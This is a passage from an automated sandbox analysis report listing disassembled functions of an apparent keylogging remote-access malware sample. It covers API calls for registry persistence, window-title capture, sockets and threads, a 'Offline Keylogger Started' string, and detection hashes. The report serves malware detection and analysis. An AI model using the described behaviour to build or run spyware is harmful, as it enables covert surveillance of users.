                                                                                                            • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                            Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                            • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                            • API String ID: 1866151309-2070987746
                                                                                                            • Opcode ID: 45f2cc7f8136337c42f5944fd7cecdfc8e179c6ee647a5e14532dc020d3e2dac
                                                                                                            • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                            • Opcode Fuzzy Hash: 45f2cc7f8136337c42f5944fd7cecdfc8e179c6ee647a5e14532dc020d3e2dac
                                                                                                            • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                            Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1365 409d97-409da7 1366 409e44-409e47 1365->1366 1367 409dad-409daf 1365->1367 1368 409db2-409dd8 call 401e07 CreateFileW 1367->1368 1371 409e18 1368->1371 1372 409dda-409de8 GetFileSize 1368->1372 1375 409e1b-409e1f 1371->1375 1373 409dea 1372->1373 1374 409e0f-409e16 CloseHandle 1372->1374 1376 409df4-409dfb 1373->1376 1377 409dec-409df2 1373->1377 1374->1375 1375->1368 1378 409e21-409e24 1375->1378 1379 409e04-409e09 Sleep 1376->1379 1380 409dfd-409dff call 40a7f0 1376->1380 1377->1374 1377->1376 1378->1366 1381 409e26-409e2d 1378->1381 1379->1374 1380->1379 1381->1366 1383 409e2f-409e3f call 4082dc call 4098a5 1381->1383 1383->1366
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleSizeSleep
                                                                                                            • String ID: `AG
                                                                                                            • API String ID: 1958988193-3058481221
                                                                                                            • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                            • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                            • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                            • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                            Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1387 4126d2-4126e9 RegCreateKeyA 1388 412722 1387->1388 1389 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1387->1389 1391 412724-412730 call 401eea 1388->1391 1389->1391
                                                                                                            APIs
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                            • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValue
                                                                                                            • String ID: HgF$pth_unenc
                                                                                                            • API String ID: 1818849710-3662775637
                                                                                                            • Opcode ID: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                                                            • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                            • Opcode Fuzzy Hash: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                                                            • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                            Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread$LocalTimewsprintf
                                                                                                            • String ID: Offline Keylogger Started
                                                                                                            • API String ID: 465354869-4114347211
                                                                                                            • Opcode ID: aa7dad158495ae52b0f3a751208c625103e585d813ac465631ead48c5b0ce597
                                                                                                            • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                            • Opcode Fuzzy Hash: aa7dad158495ae52b0f3a751208c625103e585d813ac465631ead48c5b0ce597
                                                                                                            • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                            Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                            • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValue
                                                                                                            • String ID: TUF
                                                                                                            • API String ID: 1818849710-3431404234
                                                                                                            • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                            • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                            • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                            • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                            Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 3360349984-0
                                                                                                            • Opcode ID: f4aaeb2080a592ab8258315a72005a76cc9d26b97f258a459caff36ba9a30bf0
                                                                                                            • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                            • Opcode Fuzzy Hash: f4aaeb2080a592ab8258315a72005a76cc9d26b97f258a459caff36ba9a30bf0
                                                                                                            • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                            Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3604237281-0
                                                                                                            • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                            • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                            • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                            • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                            Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountEventTick
                                                                                                            • String ID: >G
                                                                                                            • API String ID: 180926312-1296849874
                                                                                                            • Opcode ID: fc1f51a7b26503b24e24e01c710265dbc538983eb48cd157fa84ce7071ac0604
                                                                                                            • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                            • Opcode Fuzzy Hash: fc1f51a7b26503b24e24e01c710265dbc538983eb48cd157fa84ce7071ac0604
                                                                                                            • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                            Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                            • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorLastMutex
                                                                                                            • String ID: (CG
                                                                                                            • API String ID: 1925916568-4210230975
                                                                                                            • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                            • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                            • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                            • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                            Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                            • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                            • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                            • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                            • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                            Function 0041265D Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                            • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                            • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                            • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                            Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                            • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                            • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                            • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                            Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                            • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                            • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                            • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                            Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: xAG
                                                                                                            • API String ID: 176396367-2759412365
                                                                                                            • Opcode ID: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                            • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                                            • Opcode Fuzzy Hash: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                            • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                                            Function 0041A945 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID: @
                                                                                                            • API String ID: 1890195054-2766056989
                                                                                                            • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                            • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                            • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                            • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                            Function 0044B9BE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 0044B9DF
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1482568997-0
                                                                                                            • Opcode ID: 4aeba00e3fff788b378028bf06d7bcfcb791a64fa1e6dc072cb532da7a87caba
                                                                                                            • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                                            • Opcode Fuzzy Hash: 4aeba00e3fff788b378028bf06d7bcfcb791a64fa1e6dc072cb532da7a87caba
                                                                                                            • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                                            Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateEventStartupsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1953588214-0
                                                                                                            • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                            • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                            • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                            • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                            Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                              • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                            • String ID:
                                                                                                            • API String ID: 3476068407-0
                                                                                                            • Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                            • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                            • Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                            • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                            Function 0041AC52 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Window$ForegroundText
                                                                                                            • String ID:
                                                                                                            • API String ID: 29597999-0
                                                                                                            • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                            • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                            • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                            • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                            Function 00413F9A Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                              • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
